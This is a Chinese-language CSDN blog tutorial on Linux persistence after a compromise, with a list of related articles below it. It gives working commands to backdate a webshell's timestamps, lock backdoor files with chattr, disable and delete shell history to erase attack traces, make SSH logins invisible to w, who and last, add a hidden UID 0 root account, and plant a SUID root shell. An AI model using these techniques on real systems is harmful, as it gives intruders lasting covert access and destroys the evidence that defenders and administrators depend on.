Linux权限维持

最新推荐文章于 2024-06-16 17:05:07 发布
最新推荐文章于 2024-06-16 17:05:07 发布
阅读量1k 收藏 19
点赞数 34
文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A526847/article/details/139232006
版权

隐藏文件

Linux 下创建一个隐藏文件: touch .test.txt

touch 命令可以创建一个文件,文件名前面加一个 点 就代表是隐藏文件,如下图:

隐藏文件时间戳

Unix 下藏后门必须要修改时间,否则很容易被发现,直接利用 touch 就可以了。

比如参考 index.php 的时间,再赋给 webshell.php,结果两个文件的时间就一样了。

利用方法

touch -r index.php webshell.php

或者直接将时间戳修改成某年某月某日。如下 本年 01 月 02 日。

touch -t 01020000 webshell.php

touch -d "1 Jan 2020 1:1:0" file1.txt

隐藏权限

在Linux中,使用chattr命令来防止root和其他管理用户误删除和修改重要文件及目录,此权限用ls -l是查 看不出来的,从而达到隐藏权限的目的。

这个技巧常被用在后门,变成了一些难以清除的后门文件,令很多新手朋友感到头疼。

chattr +i evil.php 锁定文件
lsattr evil.php   属性查看
chattr -i evil.php 解除锁定
rm -rf 1.evil.php 删除文件

隐藏历史操作命令

在shell中执行的命令,不希望被记录在命令行历史中,如何在linux中开启无痕操作模式呢?

技巧一:只针对你的工作关闭历史记录

[space]set +o history
备注:[space] 表示空格。并且由于空格的缘故,该命令本身也不会被记录。

上面的命令会临时禁用历史功能,这意味着在这命令之后你执行的所有操作都不会记录到历史中,然而 这个命令之前的所有东西都会原样记录在历史列表中。

要重新开启历史功能,执行下面的命令:

[Space]set -o history
它将环境恢复原状,也就是你完成了你的工作,执行上述命令之后的命令都会出现在历史中。

技巧二:从历史记录中删除指定的命令

假设历史记录中已经包含了一些你不希望记录的命令。这种情况下我们怎么办?很简单。通过下面的命 令来删除:

history | grep "keyword"

输出历史记录中匹配的命令,每一条前面会有个数字。从历史记录中删除那个指定的项:

history -d [num]

这种技巧是关键记录删除,或者我们可以暴力点,比如前150行是用户的正常操作记录,150以后是攻击 者操作记录。我们可以只保留正常的操作,删除攻击痕迹的历史操作记录,这里,我们只保留前150行:

sed -i '150,$d' .bash_history

隐藏远程SSH登陆记录

#隐身登录系统,不会被w、who、last等指令检测到。

ssh -T root@192.168.68.132 /bin/bash -i

不记录ssh公钥在本地.ssh目录中

ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –i

一句话添加用户和密码

添加普通用户:

# 创建一个用户名guest,密码123456的普通用户
useradd -p `openssl passwd -1 -salt 'salt' 123456` guest
# useradd -p 方法 ` ` 是用来存放可执行的系统命令,"$()"也可以存放命令执行语句
useradd -p "$(openssl passwd -1 123456)" guest
 
# chpasswd方法
useradd guest;echo 'guest:123456'|chpasswd
 
# echo -e方法
useradd test;echo -e "123456\n123456\n" |passwd test

添加root用户:

# 创建一个用户名test1,密码123456的root用户
useradd -p `openssl passwd -1 -salt 'salt' 123456` test1 -o -u 0 -g root -G 
root -s /bin/bash -d /home/test1

SUID Shell

Suid shell是一种可用于以拥有者权限运行的shell。

配合普通用户权限使用
cp /bin/bash /tmp/shell
chmod u+s /tmp/shell

使用guest用户登录就可疑获取root权限。

备注:bash2针对suid做了一些防护措施,需要使用-p参数来获取一个root shell。另外,普通用户执行 这个SUID shell时,一定要使用全路径。

ssh公私钥免密登录

在客户端上生成一对公私钥,然后把公钥放到服务器上(~/.ssh/authorized_keys),保留私钥。当ssh 登录时,ssh程序会发送私钥去和服务器上的公钥做匹配。如果匹配成功就可以登录了。

客户端:

ssh-keygen -t rsa

过程中按三次回车,执行结束如下图:

进入/root/.ssh/文件夹,查看文件夹的内容,如下所示:

其中 id_rsa 为私钥, id_rsa.pub 为公钥,接下来打开 id_rsa.pub ,将内容复制到服务器。将 id_rsa.pub 的内容追加到 /root/.ssh/authorized_keys 内,配置完成。

亿林数据
关注
  • 34
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网渗透-linux权限维持
lza20001103的博客
08-25 541
内网渗透-linux权限维持 文章目录内网渗透-linux权限维持添加用户存在交互的shell不允许uid=0的⽤户远程登录(高版本)没交互shell⽆回显添加Linux账户密码使用linux的perl直接写入/etc/passwd隐藏后门技巧修改文件属性文件锁定历史操作命令隐藏文件进程隐藏rookit后门ReptilePAMssh公私钥免密登录ssh秘钥计划任务 反弹shell 添加用户 UID=0是最高权限的用户,有时候不能被远程登录,可以创建一个普通用户。 正常可以通过 “id” 来查看当前的用户的U
[总结]Linux权限维持1
08-03
1.[总结]SQL注总结 3.[后渗透]多姿势绕过 Powershell 调保护 5.[总结]加载 DLL 的多种式 7.[逆向]PE件格式解析 3. [WEB
linux suid权限维持速查表1
08-03
linux suid权限维持速查表linux suid 权限维持速查表赋权姿势:linux suid权限维持速查表linux suid权限维持速查表linux
网络安全-渗透中的权限维持-杨晓成-360
02-01
网络安全-渗透中的权限维持-杨晓成-360-下载版 权限维持 Windows相关 Linux相关 中间件 webshell
linux权限维持.pdf
03-31
linux权限维持.pdf
应急响应学习资料包.zip
04-03
应急响应学习资料包,供大家学习参考。 0、应急响应.pdf 1、应急响应-Linux.pdf 2、应急响应-Windows.pdf 3、应急响应实战笔记(共7章) 第01章:入侵排查篇 第02章:日志分析篇 第03章:权限维持篇 第04章:Windows实战篇 第05章:Linux实战篇 第06章:Web实战篇 第07章:恶意样本库
Linux内网渗透.doc
07-08
本文将从拿到一个 Linux shell 开始,介绍 Linux 内网渗透技术,分为容器逃逸、Linux 提权、Linux 信息收集、Linux 隧道技术、Linux 横向移动、Linux 权限维持Linux 痕迹清理几个部分。 一、容器逃逸 容器逃逸是...
Linux权限维持—隐藏踪迹篇
good good study
04-15 1792
攻击者在获取服务器权限后,会通过一些技巧来隐藏自己的踪迹和留下后门,本文介绍Linux下的几种隐藏技术。 端口复用是指不同的应用程序使用相同端口进行通讯。我们可以通过端口复用来达到隐藏端口的目的。其他作用还有很多,如内网渗透中,搭建隧道时,服务器仅允许指定的端口对外开放。利用端口复用可以将3389或22等端口转发到如80端口上,以便外部连接。...
Windows10/linux权限维持
m0_74891800的博客
02-06 874
1选项表示使用MD5加密算法,-salt 'salt'为密码添加一个盐值(一个随机字符串),123456是你要设置的明文密码。这个命令将返回加密后的密码。然后在在文件里面创建一个建建名 随便填写 我这里使用的是Debugger 然后在下面添加他的值他的值为你想要执行的文件的绝对路径,就例如;1,/var/spool/cron/ 目录下存放的是每个用户包括root的crontab任务,每个任务以创建者的名字命名。d /home/test: 这个选项设置新用户的家目录为/home/test。
Linux 权限维持手法
qq_53742230的博客
07-21 1974
Linux 权限维持手法
Linux权限维持—后门篇
good good study
04-18 3675
Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。 rootkit是linux平台下最常见的一种木马后门工具,它主要是通过替换系统文件来达到入侵和隐藏的目的。rootkit主要分为文件级别的和内核级别的
解决 Linux 和 Java 1.8 中上传中文名称图片报错问题
appearappear的博客
06-12 272
Linux 系统和 Java 1.8 中,当尝试上传含有中文名称的图片时,可能会遇到以下错误提示:为了解决这个问题,可以采取以下方法:在 Docker 的 中添加如下参数:Dockerfile使用以下命令启动 Java 程序,添加 参数:通过以上配置,确保了在启动 Java 程序时,使用了 UTF-8 编码,这样可以正确处理含有中文名称的文件,避免了报错问题的发生。3.5
Linux基础命令
威桑的博客
06-11 1191
常见基础Linux命令
Linux下的动态链接和静态链接 及 调用libevent库函数的可执行文件无法正常运行情况剖析】
一起学习进步!
06-09 341
静态链接是指在编译时,将程序所依赖的函数或数据直接复制到最终的可执行文件中。这意味着可执行文件包含了程序运行所需的所有代码和数据。动态链接是指在运行时,程序所依赖的函数或数据从外部的共享库(shared library)中加载。这意味着可执行文件只包含了必要的引用信息,而实际的代码和数据则存储在外部的共享库中。
NVIDIA Jetson Linux 35.3.1-开发指南-Jetson软件架构
FREEDOM_X的专栏
06-11 774
下图显示了NVIDIA®Jetson™Linux架构。以下部分描述了每个模块的组件。在本开发人员指南或其他地方,许多组件的名称是指向组件主留档的链接。一些组件具有带有附加描述的单独链接。
MySQl基础----Linux下搭建mysql软件及登录和基本使用(附实操图超简单一看就会)
溟洵的博客
06-10 793
本章非常基础包括如何在Linux上搭建(==当然上面的SQL语句你在其他能执行SQL语句的软件上也能正常执行,并非一定要在Linux环境下==)和mysql的基本使用
Linux】生产者消费者模型——阻塞队列BlockQueue
AAlykk的博客
06-11 970
Linux有两个重要的模型,一个是生产者消费者模型——阻塞队列BlockQueue,另一个则是生产者消费者模型——环形队列RingQueue。今天我们学习其中一个模型:【Linux】生产者消费者模型——阻塞队列BlockQueue。⭐主体生产者消费模型高效在哪里?高效体现在一个线程拿出来任务可能正在做计算,它在做计算的同时,其他线程可以继续从队列中拿,继续做运算,高效并不是体现在从队列中拿数据高效!而是我们可以让一个、多个线程并发的同时计算多个任务!
Linux Shell命令vim使用
weixin_73074505的博客
06-12 373
其中第一个直接在Linux终端在线进行,第二个则是vim编辑器中的(所谓vim编辑器可以看成将代码写进一个文件进行编辑运行)第三个vim是对文件的操作,这也是Linux最大的作用。以判断引出(学过C++其他语言容易接受)。测试当前用户对某文件是否具有“可执行”权限。测试当前用户对某文件是否具有“可读”权限。测试当前用户对某文件是否具有“可写”权限。等待时间,到时间则停止输入。参数个数 如限制密码长度。测试文件是否为普通文件。屏蔽回显,用于输入密码。输入终结符 例如输入。
linux 部署瑞数6实战(维普,药监局)sign第二部分
最新发布
weixin_54573778的博客
06-16 361
linux、python、java、逆向、药监局、瑞数rs6
Linux权限维持有哪些方法
04-29
Linux权限维持的方法有很多,其中一些常见的方法包括: 1. 提权攻击:攻击者利用系统中存在的漏洞获取root权限。 2. 密码猜测:攻击者通过猜测密码来获取用户的权限。 3. 社会工程学攻击:攻击者通过欺骗用户来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值